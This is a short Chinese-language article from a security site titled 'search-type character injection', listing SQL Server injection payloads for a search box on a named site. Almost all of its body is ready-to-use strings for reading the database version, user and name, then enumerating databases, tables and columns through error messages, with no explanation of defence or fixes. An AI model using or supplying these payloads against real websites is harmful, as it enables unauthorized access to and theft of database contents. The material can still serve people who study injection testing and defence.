频道栏目
首页 > 安全 > 网站安全 > 正文

搜索型字符注入

2011-07-19 10:45:51           
收藏   我要投稿

SQL注入:aspx">http://www.2cto.com/ZW_index.aspx 
搜索注入
1、基本信息
数据库版本:
2011%' and 1=(select @@version) and '%'=''
数据库连接用户:
2011%' and user>0 and '%'='              

数据库:
2011%' and db_name()>0 and '%'='       

2、暴库
2011%' and 1=(select top 1 name from master..sysdatabases where name not in (select top 1 name from master..sysdatabases)) and '%'='
3、暴表
2011%' and 1=(select top 1 name from wjly..sysobjects where xtype='u' and name not in (select top 1 name from wjly..sysobjects where xtype='u')) and '%'='
4、暴列名
2011%' and 1=(select col_name(object_id('MSJ_mcmd'),1)) and '%'=

字符搜索型注入。

 from:f4le.com

相关TAG标签 字符
上一篇:半岛影院搜索报错泄露绝对路径及修复
下一篇:解决:安全性异常 ,请求类型的权限已失败
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站